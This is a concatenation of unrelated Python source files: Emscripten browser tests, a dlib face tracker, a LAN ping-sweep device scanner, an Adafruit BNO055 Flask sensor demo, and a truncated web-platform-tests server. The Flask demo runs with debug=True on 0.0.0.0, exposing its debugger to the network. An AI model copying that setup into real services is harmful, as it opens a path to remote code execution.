html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
      # Restore the .wasm.js file, then corrupt the .wasm file, which should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(test_file('system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', test_file('test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', test_file('test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
               expected='-65536', # == 4*1024*1024*1024 - 65536 cast to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(test_file('alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser', 'emmalloc_memgrowth.cpp'), expected='0', args=['-s', 'MALLOC=emmalloc', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'ABORTING_MALLOC=0', '-s', 'ASSERTIONS=2', '-s', 'MINIMAL_RUNTIME=1', '-s', 'MAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
    # the specific symptom of the hang that was fixed is that the test hangs
    # at some point, using 0% CPU. Often that occurred in 0-200 iterations, but
    # you may want to adjust "ITERATIONS".
self.btest(test_file('pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser', 'test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
    # not close as part of the test, pinning down the cwd on Windows so that it
    # could not be deleted. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
dlib_tracker.py
|
import multiprocessing as mp
import os
import queue
from statistics import median
import dlib
import numpy as np
class DlibTracker():
def __init__(self, face_detect_strategy=None):
try:
self._detect_proc = None
model_path = os.path.join(os.getcwd(), "res", "shape_predictor_68_face_landmarks.dat")
self._face_detector = dlib.get_frontal_face_detector()
self._pose_estimator = dlib.shape_predictor(model_path)
self._smoothed = {pt: ([], []) for pt in DlibTracker._dlib2mpeg4}
if face_detect_strategy is None:
face_detect_strategy = "smart"
self._fd_fast = face_detect_strategy != "brute"
self._fd_smart = face_detect_strategy == "smart"
if self._fd_fast:
self._last_detected_faces = []
self._work_queue = mp.Queue(1)
self._results_queue = mp.Queue(1)
self._detect_proc = mp.Process(target=self._detectFacesThreaded, name="dlib_tracker")
self._detect_proc.start()
except RuntimeError:
print("Please download and unzip "
"http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2 into 'res' folder")
raise
@staticmethod
def __version__():
return dlib.__version__
def __del__(self):
self.stop()
def _detectFacesThreaded(self):
while True:
image = self._work_queue.get()
if image is None:
break
detected_faces = self._face_detector(image, 0)
try:
self._results_queue.put_nowait(detected_faces)
except queue.Full:
pass
def trackFaces(self, image, frameNumber, timeStamp_ms, searchRect=None, desiredAttributes=None):
x, y, w, h = self._sanitizeRoi(image.shape, searchRect)
searchImage = image[y:y + h, x:x + w]
if self._fd_fast:
try:
self._work_queue.put_nowait(np.copy(searchImage))
except queue.Full:
pass
try:
self._last_detected_faces = self._results_queue.get_nowait()
except queue.Empty:
pass
            # With the "smart" strategy, fall back to synchronous face detection
            # whenever the last asynchronous result came back empty
if self._fd_smart and not self._last_detected_faces:
self._last_detected_faces = self._face_detector(searchImage, 0)
else:
self._last_detected_faces = self._face_detector(searchImage, 0)
face_rects = self._last_detected_faces
faces = {}
for i, rect in enumerate(face_rects):
face_points = self._pose_estimator(searchImage, rect)
points = {}
for j in range(face_points.num_parts):
                # The clamp to 0 is here because dlib will happily give you negative
                # coordinates, which the SDK obviously cannot handle
newx = face_points.part(j).x + x if face_points.part(j).x + x > 0 else 0
newy = face_points.part(j).y + y if face_points.part(j).y + y > 0 else 0
pointname = DlibTracker._dlib2mpeg4[j]
smoothedx, smoothedy = self._smoothPoints(newx, newy, pointname)
points[pointname] = {"x": smoothedx, "y": smoothedy, "valid": True, "estimated": True, "quality": 1.0}
faces[str(i)] = {
"id": str(i + 1),
"rect.x": rect.left() + x if rect.left() + x > 0 else 0,
"rect.y": rect.top() + y if rect.top() + y > 0 else 0,
"rect.w": rect.width(),
"rect.h": rect.height(),
"detected": True,
"poseValid": True if len(points) > 0 else False,
"points": points
}
return faces
def stop(self):
if self._detect_proc and self._detect_proc.is_alive():
self._work_queue.put(None)
self._detect_proc.terminate()
self._work_queue.cancel_join_thread()
self._results_queue.cancel_join_thread()
def _smoothPoints(self, newx, newy, pointname, framesToSmooth=10):
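        # Median-of-window smoothing: keep up to `framesToSmooth` recent raw
        # positions per landmark and report their median, which rejects
        # single-frame detector jitter with less lag than a mean over the same window.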
xs, ys = self._smoothed[pointname]
xs.append(newx)
ys.append(newy)
if len(xs) > framesToSmooth:
self._smoothed[pointname] = xs[1:], ys[1:]
smoothedx = median(xs)
smoothedy = median(ys)
return smoothedx, smoothedy
# TODO check this
def _sanitizeRoi(self, shape, rect=None):
if rect is None:
return (0, 0, shape[1] - 1, shape[0] - 1)
else:
x, y, w, h = rect
left = x if x > 0 else 0
top = y if y > 0 else 0
            width = w if 0 < w < shape[1] else shape[1]
            height = h if 0 < h < shape[0] else shape[0]
return (left, top, width, height)
# This is a class attribute
_dlib2mpeg4 = [
"13.2", # DLIB: 0
"13.4", # DLIB: 1
"13.6", # DLIB: 2
"13.8", # DLIB: 3
"13.10", # DLIB: 4
"13.12", # DLIB: 5
"13.14", # DLIB: 6
"13.16", # DLIB: 7
"13.17", # DLIB: 8
"13.15", # DLIB: 9
"13.13", # DLIB: 10
"13.11", # DLIB: 11
"13.9", # DLIB: 12
"13.7", # DLIB: 13
"13.5", # DLIB: 14
"13.3", # DLIB: 15
"13.1", # DLIB: 16
# left eye brow
"4.6", # DLIB: 17
"14.4", # DLIB: 18
"4.4", # DLIB: 19
"14.2", # DLIB: 20
"4.2", # DLIB: 21
# right eye brow
"4.1", # DLIB: 22
"14.1", # DLIB: 23
"4.3", # DLIB: 24
"14.3", # DLIB: 25
"4.5", # DLIB: 26
# nose bridge
"12.1", # DLIB: 27
"9.12", # DLIB: 28 -- This is a point that does not exist in Visage
"9.12", # DLIB: 29
"9.3", # DLIB: 30
# lower nose
"9.2", # DLIB: 31
"9.4", # DLIB: 32
"9.15", # DLIB: 33
"9.5", # DLIB: 34
"9.1", # DLIB: 35
# right eye relative to the user
"3.12", # DLIB: 36
"12.10", # DLIB: 37
"12.6", # DLIB: 38
"3.8", # DLIB: 39
"12.8", # DLIB: 40
"12.12", # DLIB: 41
# left eye relative to the user
"3.11", # DLIB: 42
"12.9", # DLIB: 43
"12.5", # DLIB: 44
"3.7", # DLIB: 45
"12.7", # DLIB: 46
"12.11", # DLIB: 47
# mouth
"8.4", # DLIB: 48
"8.6", # DLIB: 49
"8.9", # DLIB: 50
"8.1", # DLIB: 51
"8.10", # DLIB: 52
"8.5", # DLIB: 53
"8.3", # DLIB: 54
"8.7", # DLIB: 55 -- This is a point that does not exist in Visage, consider 8.8
"8.7", # DLIB: 56
"8.2", # DLIB: 57
"8.8", # DLIB: 58 -- This is a point that does not exist in Visage, consider 8.7
"8.8", # DLIB: 59
# mouth region
"2.5", # DLIB: 60
"2.7", # DLIB: 61
"2.2", # DLIB: 62
"2.6", # DLIB: 63
"2.4", # DLIB: 64
"2.8", # DLIB: 65
"2.3", # DLIB: 66
"2.9" # DLIB: 67
]
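
# Minimal usage sketch (not part of the original module): assumes OpenCV is
# installed as `cv2`, a webcam is available, and the shape predictor model has
# been unpacked into ./res as described in the __init__ error message.
if __name__ == "__main__":
    import cv2

    tracker = DlibTracker(face_detect_strategy="smart")
    capture = cv2.VideoCapture(0)
    frame_number = 0
    try:
        while frame_number < 100:
            ok, frame = capture.read()
            if not ok:
                break
            # dlib expects RGB input; OpenCV captures frames as BGR.
            rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            faces = tracker.trackFaces(rgb, frame_number, frame_number * 33)
            print("frame {}: {} face(s)".format(frame_number, len(faces)))
            frame_number += 1
    finally:
        capture.release()
        tracker.stop()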
|
SearchDevices.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import ipaddress
import socket
import netifaces
import netaddr
import threading
import time
import platform
import sys
import os
MYPATH = os.path.dirname(__file__)
print("Module [SearchDevices] path: {} __package__: {} __name__: {} __file__: {}".format(
sys.path[0], __package__, __name__, MYPATH))
try:
from . import LocalMachine
CommandHandler = LocalMachine.CommandHandler
except Exception as e:
print("Import warning __name__:{}: {}".format(__name__, e))
sys.path.append(MYPATH)
from LocalMachine import CommandHandler
print("Module [SearchDevices] path: {} __package__: {} __name__: {}".format(sys.path[0], __package__, __name__))
try:
from . import LocalMachine
CommandHandler = LocalMachine.CommandHandler
except Exception as e:
print("Import warning __name__:{}: {}".format(__name__, e))
sys.path.append(sys.path[0])
from LocalMachine import CommandHandler
AVAILABLE_DEVICES_LIST = []
def add_element_to_list(element):
global AVAILABLE_DEVICES_LIST
if element not in AVAILABLE_DEVICES_LIST:
AVAILABLE_DEVICES_LIST.append(element)
def get_all_hosts(net, subnet=24):
"""
Generate network range list for scanning
"""
    # Build the CIDR network address string
net_addr = '{net}/{subnet}'.format(net=net, subnet=subnet)
# Create the network
ip_net = ipaddress.ip_network(net_addr)
# Get all hosts on that network
all_hosts = list(ip_net.hosts())
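    # ip_net.hosts() already excludes the network and broadcast addresses; the
    # slice below additionally drops the first usable host (typically the
    # gateway) and the last one.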
return all_hosts[1:-1]
def my_local_ip():
"""
Get local machine local IP
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
local_ip = s.getsockname()[0]
s.close()
return local_ip
def gateway_ip():
"""
Get router IP
"""
gws = netifaces.gateways()
return list(gws['default'].values())[0][0]
def guess_net_address(gateway_ip, subnet=24):
"""
Determine network IP
"""
ip = netaddr.IPNetwork('{gw_ip}/{subnet}'.format(gw_ip=gateway_ip, subnet=subnet))
return ip.network
def __worker_filter_online_devices(host_list, port, thname="main"):
"""
Get online devices from network range
"""
global AVAILABLE_DEVICES_LIST
for host in host_list:
host = str(host)
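        # NOTE: ICMP ping has no notion of TCP/UDP ports; on the non-Windows
        # branch below, `-p` sets the ICMP payload pad pattern (hex bytes), so
        # the service port merely tags the probe rather than testing the port.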
command = "ping {ip} -n 1".format(ip=host) if platform.system().lower()=='windows' else "ping -c 1 -p {port} {ip}".format( port=port, ip=host)
exitcode, stdout, stderr = CommandHandler.run_command(command, shell=True)
if exitcode == 0 and 'unreachable' not in stdout.lower():
print("[{}] ONLINE: {}".format(thname, host))
add_element_to_list(host)
else:
print("[{}] OFFLINE: {}".format(thname, host))
def filter_threads(host_list, port, threads=80):
"""
Use threads for parallel network scanning
"""
thread_instance_list = []
range_size = len(host_list) / threads
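    # Partition the hosts into `threads` contiguous chunks. Rounding the
    # fractional chunk size keeps the indices contiguous (chunk n ends exactly
    # where chunk n+1 starts), so no host is skipped or scanned twice.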
for cnt in range(1, threads+1):
start_index = round((cnt-1)*range_size)
end_index = round(cnt*range_size)
#print("RANGE: {} - {}".format(start_index, end_index))
host_range = host_list[start_index:end_index]
thread_name = "thread-{}-[{}-{}]".format(cnt, start_index, end_index)
thread_instance_list.append(
threading.Thread(target=__worker_filter_online_devices, args=(host_range, port, thread_name,))
)
for mythread in thread_instance_list:
mythread.start()
for mythread in thread_instance_list:
mythread.join()
print("{} device was found: {}".format(len(AVAILABLE_DEVICES_LIST), AVAILABLE_DEVICES_LIST))
return AVAILABLE_DEVICES_LIST
def online_device_scanner(service_port=9008):
start_time = time.time()
gw_ip = gateway_ip()
net_ip = guess_net_address(gw_ip)
all_hosts_in_net_list = get_all_hosts(net_ip)
online_devices = filter_threads(all_hosts_in_net_list, port=service_port)
end_time = time.time()
print("Elapsed time: {}".format(end_time - start_time))
return online_devices
def node_is_online(ip, port=9008):
cmd_base = 'ping -c 1 -p {port} {ip}'
cmd = cmd_base.format(port=port, ip=ip)
    # Use CommandHandler directly: the module-level fallback import binds only
    # CommandHandler, so the name LocalMachine may not be defined here.
    exitcode, stdout, stderr = CommandHandler.run_command(cmd, shell=True, debug=False)
    return exitcode == 0 and len(stderr.strip()) == 0
if __name__ == "__main__":
online_device_scanner()
|
server.py
|
# SPDX-FileCopyrightText: 2015 Tony DiCola for Adafruit Industries
# SPDX-FileCopyrightText: 2019 Carter Nelson for Adafruit Industries
# SPDX-License-Identifier: MIT
# Adafruit BNO055 WebGL Example
#
# Requires the flask web framework to be installed. See http://flask.pocoo.org/
# for installation instructions, however on a Linux machine like the Raspberry
# Pi or BeagleBone black you can likely install it by running:
# sudo apt-get update
# sudo apt-get install python3-flask
#
# Author: Tony DiCola
# 2019 update: Carter Nelson
import json
import threading
import time
import board
import busio
import flask
import adafruit_bno055
i2c = busio.I2C(board.SCL, board.SDA)
# Create the BNO sensor connection.
bno = adafruit_bno055.BNO055_I2C(i2c)
# Application configuration below. You probably don't need to change these values.
# How often to update the BNO sensor data (in hertz).
BNO_UPDATE_FREQUENCY_HZ = 10
# Name of the file to store calibration data when the save/load calibration
# button is pressed. Calibration data is stored in JSON format.
CALIBRATION_FILE = "calibration.json"
# BNO sensor axes remap values. These are the parameters to the BNO.set_axis_remap
# function. Don't change these without consulting section 3.4 of the datasheet.
# The default axes mapping below assumes the Adafruit BNO055 breakout is flat on
# a table with the row of SDA, SCL, GND, VIN, etc pins facing away from you.
# BNO_AXIS_REMAP = { 'x': BNO055.AXIS_REMAP_X,
# 'y': BNO055.AXIS_REMAP_Z,
# 'z': BNO055.AXIS_REMAP_Y,
# 'x_sign': BNO055.AXIS_REMAP_POSITIVE,
# 'y_sign': BNO055.AXIS_REMAP_POSITIVE,
# 'z_sign': BNO055.AXIS_REMAP_NEGATIVE }
# Create flask application.
app = flask.Flask(__name__)
# Global state to keep track of the latest readings from the BNO055 sensor.
# This will be accessed from multiple threads so care needs to be taken to
# protect access with a lock (or else inconsistent/partial results might be read).
# A condition object is used both as a lock for safe access across threads, and
# to notify threads that the BNO state has changed.
bno_data = {}
bno_changed = threading.Condition()
# Background thread to read BNO sensor data. Will be created right before
# the first request is served (see start_bno_thread below).
bno_thread = None
def read_bno():
"""Function to read the BNO sensor and update the bno_data object with the
latest BNO orientation, etc. state. Must be run in its own thread because
it will never return!
"""
while True:
# Capture the lock on the bno_changed condition so the bno_data shared
# state can be updated.
with bno_changed:
bno_data["euler"] = bno.euler
bno_data["temp"] = bno.temperature
bno_data["quaternion"] = bno.quaternion
bno_data["calibration"] = bno.calibration_status
# Notify any waiting threads that the BNO state has been updated.
bno_changed.notify_all()
# Sleep until the next reading.
time.sleep(1.0 / BNO_UPDATE_FREQUENCY_HZ)
def bno_sse():
"""Function to handle sending BNO055 sensor data to the client web browser
using HTML5 server sent events (aka server push). This is a generator function
that flask will run in a thread and call to get new data that is pushed to
the client web page.
"""
# Loop forever waiting for a new BNO055 sensor reading and sending it to
# the client. Since this is a generator function the yield statement is
# used to return a new result.
while True:
# Capture the bno_changed condition lock and then wait for it to notify
# a new reading is available.
with bno_changed:
bno_changed.wait()
# A new reading is available! Grab the reading value and then give
# up the lock.
heading, roll, pitch = bno_data["euler"]
temp = bno_data["temp"]
x, y, z, w = bno_data["quaternion"]
sys, gyro, accel, mag = bno_data["calibration"]
# Send the data to the connected client in HTML5 server sent event format.
data = {
"heading": heading,
"roll": roll,
"pitch": pitch,
"temp": temp,
"quatX": x,
"quatY": y,
"quatZ": z,
"quatW": w,
"calSys": sys,
"calGyro": gyro,
"calAccel": accel,
"calMag": mag,
}
yield "data: {0}\n\n".format(json.dumps(data))
@app.before_first_request
def start_bno_thread():
# Start the BNO thread right before the first request is served. This is
# necessary because in debug mode flask will start multiple main threads so
# this is the only spot to put code that can only run once after starting.
# See this SO question for more context:
# http://stackoverflow.com/questions/24617795/starting-thread-while-running-flask-with-debug
global bno_thread # pylint: disable=global-statement
# Kick off BNO055 reading thread.
bno_thread = threading.Thread(target=read_bno)
bno_thread.daemon = True # Don't let the BNO reading thread block exiting.
bno_thread.start()
@app.route("/bno")
def bno_path():
# Return SSE response and call bno_sse function to stream sensor data to
# the webpage.
return flask.Response(bno_sse(), mimetype="text/event-stream")
@app.route("/save_calibration", methods=["POST"])
def save_calibration():
# Save calibration data to disk.
#
# TODO: implement this
#
return "OK"
@app.route("/load_calibration", methods=["POST"])
def load_calibration():
# Load calibration from disk.
#
# TODO: implement this
#
return "OK"
@app.route("/")
def root():
return flask.render_template("index.html")
if __name__ == "__main__":
# Create a server listening for external connections on the default
# port 5000. Enable debug mode for better error messages and live
# reloading of the server on changes. Also make the server threaded
# so multiple connections can be processed at once (very important
# for using server sent events).
app.run(host="0.0.0.0", debug=True, threaded=True)
|
serve.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import logging
import os
import platform
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
from six.moves import urllib
import uuid
from collections import defaultdict, OrderedDict
from itertools import chain, product
from multiprocessing import Process, Event
from localpaths import repo_root
from six.moves import reload_module
from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port, HTTPException, http2_compatible
from mod_pywebsocket import standalone as pywebsocket
EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains "
"are mapped to a loopback device in /etc/hosts.\n"
"See https://web-platform-tests.org/running-tests/from-local-system.html#system-setup "
"for instructions.")
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
def domains_are_distinct(a, b):
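    """Return True if neither domain equals, or is a subdomain of, the other.

    e.g. "a.example.test" and "example.test" are NOT distinct (shared suffix),
    while "web-platform.test" and "not-web-platform.test" are distinct.
    """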
a_parts = a.split(".")
b_parts = b.split(".")
min_length = min(len(a_parts), len(b_parts))
slice_index = -1 * min_length
return a_parts[slice_index:] != b_parts[slice_index:]
class WrapperHandler(object):
    # NOTE: as spelled, this attribute has no effect; Python 2 expects
    # `__metaclass__` and Python 3 the `metaclass=` class keyword, so the
    # abstract declarations below serve as documentation rather than being enforced.
    __meta__ = abc.ABCMeta
headers = []
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
for header_name, header_value in self.headers:
response.headers.set(header_name, header_value)
self.check_exposure(request)
path = self._get_path(request.url_parts.path, True)
query = request.url_parts.query
if query:
query = "?" + query
meta = "\n".join(self._get_meta(request))
script = "\n".join(self._get_script(request))
response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
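    # Illustrative mapping (assuming the WorkersHandler.path_replace defined below):
    #   _get_path("/x/y.any.worker.html", resource_path=True)  -> "/x/y.any.worker.js"
    #   _get_path("/x/y.any.worker.html", resource_path=False) -> "/x/y.any.js"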
def _get_metadata(self, request):
"""Get an iterator over script metadata based on // META comments in the
associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
try:
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
yield key, value
except IOError:
raise HTTPException(404)
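    # For example, a .any.js test beginning with
    #   // META: global=window,dedicatedworker
    #   // META: script=/common/get-host-info.sub.js
    # yields the pairs ("global", "window,dedicatedworker") and
    # ("script", "/common/get-host-info.sub.js").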
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
def _get_script(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._script_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
@abc.abstractmethod
def check_exposure(self, request):
# Raise an exception if this handler shouldn't be exposed after all.
pass
class HtmlWrapperHandler(WrapperHandler):
global_type = None
headers = [('Content-Type', 'text/html')]
def check_exposure(self, request):
if self.global_type:
globals = u""
for (key, value) in self._get_metadata(request):
if key == "global":
globals = value
break
if self.global_type not in parse_variants(globals):
raise HTTPException(404, "This test cannot be loaded in %s mode" %
self.global_type)
def _meta_replacement(self, key, value):
if key == "timeout":
if value == "long":
return '<meta name="timeout" content="long">'
if key == "title":
value = value.replace("&", "&").replace("<", "<")
return '<title>%s</title>' % value
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("&", "&").replace('"', """)
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
global_type = "dedicatedworker"
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
global_type = "window"
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
